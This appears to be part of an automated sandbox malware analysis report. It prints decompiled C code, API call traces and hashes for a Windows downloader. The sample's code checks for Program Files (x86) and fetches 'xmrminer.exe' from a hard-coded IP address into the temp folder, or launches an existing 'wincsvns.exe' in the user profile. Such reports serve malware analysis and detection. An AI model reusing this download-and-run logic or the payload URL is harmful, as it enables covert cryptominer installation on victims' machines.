                                                                                  				struct _STARTUPINFOA _v96;
                                                                                  				int _v100;
                                                                                  				char** _v104;
                                                                                  				int _v108;
                                                                                  				void _v112;
                                                                                  				char** _v116;
                                                                                  				intOrPtr* _v120;
                                                                                  				intOrPtr _v124;
                                                                                  				void* _t27;
                                                                                  				intOrPtr _t36;
                                                                                  				signed int _t38;
                                                                                  				int _t40;
                                                                                  				intOrPtr* _t41;
                                                                                  				intOrPtr _t42;
                                                                                  				intOrPtr _t49;
                                                                                  				intOrPtr* _t55;
                                                                                  				intOrPtr _t58;
                                                                                  
                                                                                  				_push(0xffffffff);
                                                                                  				_push(0x10d2300);
                                                                                  				_push(0x10d1600);
                                                                                  				_push( *[fs:0x0]);
                                                                                  				 *[fs:0x0] = _t58;
                                                                                  				_v28 = _t58 - 0x68;
                                                                                  				_v8 = 0;
                                                                                  				__set_app_type(2);
                                                                                  				 *0x10d3030 =  *0x10d3030 | 0xffffffff;
                                                                                  				 *0x10d3034 =  *0x10d3034 | 0xffffffff;
                                                                                  				 *(__p__fmode()) =  *0x10d302c;
                                                                                  				 *(__p__commode()) =  *0x10d3028;
                                                                                  				 *0x10d3038 = _adjust_fdiv;
                                                                                  				_t27 = E010D15FB( *_adjust_fdiv);
                                                                                  				if( *0x10d3010 == 0) {
                                                                                  					__setusermatherr(E010D15F8);
                                                                                  				}
                                                                                  				E010D15E6(_t27);
                                                                                  				_push(0x10d300c);
                                                                                  				_push(0x10d3008);
                                                                                  				L010D15E0();
                                                                                  				_v112 =  *0x10d3024;
                                                                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x10d3020,  &_v112);
                                                                                  				_push(0x10d3004);
                                                                                  				_push(0x10d3000);
                                                                                  				L010D15E0();
                                                                                  				_t55 =  *_acmdln;
                                                                                  				_v120 = _t55;
                                                                                  				if( *_t55 != 0x22) {
                                                                                  					while(1) {
                                                                                  						__eflags =  *_t55 - 0x20;
                                                                                  						if(__eflags <= 0) {
                                                                                  							goto L7;
                                                                                  						}
                                                                                  						_t55 = _t55 + 1;
                                                                                  						_v120 = _t55;
                                                                                  					}
                                                                                  				} else {
                                                                                  					do {
                                                                                  						_t55 = _t55 + 1;
                                                                                  						_v120 = _t55;
                                                                                  						_t42 =  *_t55;
                                                                                  					} while (_t42 != 0 && _t42 != 0x22);
                                                                                  					if( *_t55 == 0x22) {
                                                                                  						L6:
                                                                                  						_t55 = _t55 + 1;
                                                                                  						_v120 = _t55;
                                                                                  					}
                                                                                  				}
                                                                                  				L7:
                                                                                  				_t36 =  *_t55;
                                                                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				_v96.dwFlags = 0;
                                                                                  				GetStartupInfoA( &_v96); // executed
                                                                                  				_t69 = _v96.dwFlags & 0x00000001;
                                                                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                                  					_t38 = 0xa;
                                                                                  				} else {
                                                                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                                                  				}
                                                                                  				_t40 = E010D13E0(_t69, GetModuleHandleA(0), 0, _t55, _t38); // executed
                                                                                  				_v108 = _t40;
                                                                                  				exit(_t40); // executed
                                                                                  				_t41 = _v24;
                                                                                  				_t49 =  *((intOrPtr*)( *_t41));
                                                                                  				_v124 = _t49;
                                                                                  				_push(_t41);
                                                                                  				_push(_t49);
                                                                                  				L010D15DA();
                                                                                  				return _t41;
                                                                                  			}























                                                                                  0x010d147f
                                                                                  0x010d1481
                                                                                  0x010d1486
                                                                                  0x010d1491
                                                                                  0x010d1492
                                                                                  0x010d149f
                                                                                  0x010d14a4
                                                                                  0x010d14a9
                                                                                  0x010d14b0
                                                                                  0x010d14b7
                                                                                  0x010d14ca
                                                                                  0x010d14d8
                                                                                  0x010d14e1
                                                                                  0x010d14e6
                                                                                  0x010d14f1
                                                                                  0x010d14f8
                                                                                  0x010d14fe
                                                                                  0x010d14ff
                                                                                  0x010d1504
                                                                                  0x010d1509
                                                                                  0x010d150e
                                                                                  0x010d1518
                                                                                  0x010d1531
                                                                                  0x010d1537
                                                                                  0x010d153c
                                                                                  0x010d1541
                                                                                  0x010d154e
                                                                                  0x010d1550
                                                                                  0x010d1556
                                                                                  0x010d1592
                                                                                  0x010d1592
                                                                                  0x010d1595
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x010d1597
                                                                                  0x010d1598
                                                                                  0x010d1598
                                                                                  0x010d1558
                                                                                  0x010d1558
                                                                                  0x010d1558
                                                                                  0x010d1559
                                                                                  0x010d155c
                                                                                  0x010d155e
                                                                                  0x010d1569
                                                                                  0x010d156b
                                                                                  0x010d156b
                                                                                  0x010d156c
                                                                                  0x010d156c
                                                                                  0x010d1569
                                                                                  0x010d156f
                                                                                  0x010d156f
                                                                                  0x010d1573
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x010d1579
                                                                                  0x010d1580
                                                                                  0x010d1586
                                                                                  0x010d158a
                                                                                  0x010d159f
                                                                                  0x010d158c
                                                                                  0x010d158c
                                                                                  0x010d158c
                                                                                  0x010d15ab
                                                                                  0x010d15b0
                                                                                  0x010d15b4
                                                                                  0x010d15ba
                                                                                  0x010d15bf
                                                                                  0x010d15c1
                                                                                  0x010d15c4
                                                                                  0x010d15c5
                                                                                  0x010d15c6
                                                                                  0x010d15cd

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.420156845.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true
                                                                                  • Associated: 00000007.00000002.420152084.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.420162222.00000000010D2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.420165890.00000000010D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_10d0000_509517324.jbxd
                                                                                  Similarity
                                                                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                  • String ID:
                                                                                  • API String ID: 801014965-0
                                                                                  • Opcode ID: 6502ff1d0215f347a48b186dd330b851e0f4330c505c0a2dee76845486a83c1b
                                                                                  • Instruction ID: 4d48201928f43b70ea6444c280acd5746713bd5f04a8347fbc35332985cf6a9a
                                                                                  • Opcode Fuzzy Hash: 6502ff1d0215f347a48b186dd330b851e0f4330c505c0a2dee76845486a83c1b
                                                                                  • Instruction Fuzzy Hash: EF419EB1D01304EFDB35DFA8D888AA97FB9FB08710F64015AF9C29B249CB395841CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 100%
                                                                                  			E010D13E0(void* __eflags) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				signed char _t9;
                                                                                  				int _t12;
                                                                                  
                                                                                  				Sleep(0x7d0); // executed
                                                                                  				ExpandEnvironmentStringsW(L"%userprofile%",  &_v1044, 0x104);
                                                                                  				wsprintfW( &_v524, L"%s\\wincsvns.exe",  &_v1044);
                                                                                  				_t9 = E010D1380(); // executed
                                                                                  				if((_t9 & 0x000000ff) != 0) {
                                                                                  					_t12 = PathFileExistsW( &_v524); // executed
                                                                                  					if(_t12 != 0) {
                                                                                  						E010D1000( &_v524);
                                                                                  					} else {
                                                                                  						E010D10B0(L"http://185.215.113.84/xmrminer.exe"); // executed
                                                                                  					}
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}







                                                                                  0x010d13ee
                                                                                  0x010d1405
                                                                                  0x010d141e
                                                                                  0x010d1427
                                                                                  0x010d1431
                                                                                  0x010d143a
                                                                                  0x010d1442
                                                                                  0x010d145a
                                                                                  0x010d1444
                                                                                  0x010d1449
                                                                                  0x010d144e
                                                                                  0x010d1442
                                                                                  0x010d1467

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 010D13EE
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 010D1405
                                                                                  • wsprintfW.USER32 ref: 010D141E
                                                                                    • Part of subcall function 010D1380: ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 010D139A
                                                                                    • Part of subcall function 010D1380: wsprintfW.USER32 ref: 010D13B3
                                                                                    • Part of subcall function 010D1380: PathFileExistsW.KERNELBASE(?), ref: 010D13C3
                                                                                  • PathFileExistsW.KERNELBASE(?), ref: 010D143A
                                                                                    • Part of subcall function 010D10B0: GetTickCount.KERNEL32 ref: 010D10B9
                                                                                    • Part of subcall function 010D10B0: srand.MSVCRT ref: 010D10C0
                                                                                    • Part of subcall function 010D10B0: rand.MSVCRT ref: 010D10C8
                                                                                    • Part of subcall function 010D10B0: Sleep.KERNELBASE ref: 010D10DF
                                                                                    • Part of subcall function 010D10B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 010D10FD
                                                                                    • Part of subcall function 010D10B0: rand.MSVCRT ref: 010D1103
                                                                                    • Part of subcall function 010D10B0: rand.MSVCRT ref: 010D1117
                                                                                    • Part of subcall function 010D10B0: wsprintfW.USER32 ref: 010D113E
                                                                                    • Part of subcall function 010D10B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 010D1154
                                                                                    • Part of subcall function 010D10B0: InternetOpenUrlW.WININET(00000000,010D144E,00000000,00000000,00000000,00000000), ref: 010D1180
                                                                                    • Part of subcall function 010D10B0: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 010D11AF
                                                                                    • Part of subcall function 010D10B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 010D11E2
                                                                                    • Part of subcall function 010D10B0: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 010D1213
                                                                                    • Part of subcall function 010D10B0: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 010D1222
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.420156845.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true
                                                                                  • Associated: 00000007.00000002.420152084.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.420162222.00000000010D2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.420165890.00000000010D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_10d0000_509517324.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$EnvironmentExpandInternetStringsrandwsprintf$ExistsOpenPathSleep$ChangeCloseCountCreateFindNotificationReadTickWritesrand
                                                                                  • String ID: %s\wincsvns.exe$%userprofile%$0H+u$http://185.215.113.84/xmrminer.exe
                                                                                  • API String ID: 935485402-2946983385
                                                                                  • Opcode ID: 31b296838a75ada3a495c325b58fa02677c09e5830218584ef73c1926e3b35f9
                                                                                  • Instruction ID: ea59bf68817ebeee95e534ba51ee70c21235528a8fb1a1a7547e2a8caebc8a30
                                                                                  • Opcode Fuzzy Hash: 31b296838a75ada3a495c325b58fa02677c09e5830218584ef73c1926e3b35f9
                                                                                  • Instruction Fuzzy Hash: DFF0FCB550030977E720F7B0AC49FFA37786F04605F0489A4FAC995046FEB596D8CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 58 10d1380-10d13cb ExpandEnvironmentStringsW wsprintfW 60 10d13cd-10d13cf 58->60 61 10d13d1 58->61 62 10d13d3-10d13d6 60->62 61->62
                                                                                  C-Code - Quality: 100%
                                                                                  			E010D1380() {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				int _t9;
                                                                                  
                                                                                  				ExpandEnvironmentStringsW(L"%systemdrive%",  &_v524, 0x104);
                                                                                  				wsprintfW( &_v1044, L"%s\\Program Files (x86)",  &_v524);
                                                                                  				_t9 = PathFileExistsW( &_v1044); // executed
                                                                                  				if(_t9 == 0) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				return 1;
                                                                                  			}






                                                                                  0x010d139a
                                                                                  0x010d13b3
                                                                                  0x010d13c3
                                                                                  0x010d13cb
                                                                                  0x00000000
                                                                                  0x010d13d1
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 010D139A
                                                                                  • wsprintfW.USER32 ref: 010D13B3
                                                                                  • PathFileExistsW.KERNELBASE(?), ref: 010D13C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.420156845.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true
                                                                                  • Associated: 00000007.00000002.420152084.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.420162222.00000000010D2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.420165890.00000000010D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_10d0000_509517324.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentExistsExpandFilePathStringswsprintf
                                                                                  • String ID: %s\Program Files (x86)$%systemdrive%$0H+u
                                                                                  • API String ID: 3337111443-1867182536
                                                                                  • Opcode ID: 2436e103576d486f713ec4d2904a3352c76b737a5005ddfb4479f9528b7776b9
                                                                                  • Instruction ID: 90cb4585884ef380edfb9739656850d246abb6237a6344f76e5bd2a4908ef307
                                                                                  • Opcode Fuzzy Hash: 2436e103576d486f713ec4d2904a3352c76b737a5005ddfb4479f9528b7776b9
                                                                                  • Instruction Fuzzy Hash: 6CE065B150030C6BDB20DA61AC49AF6776CAB00605F044598BA9482041EEF556D8CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%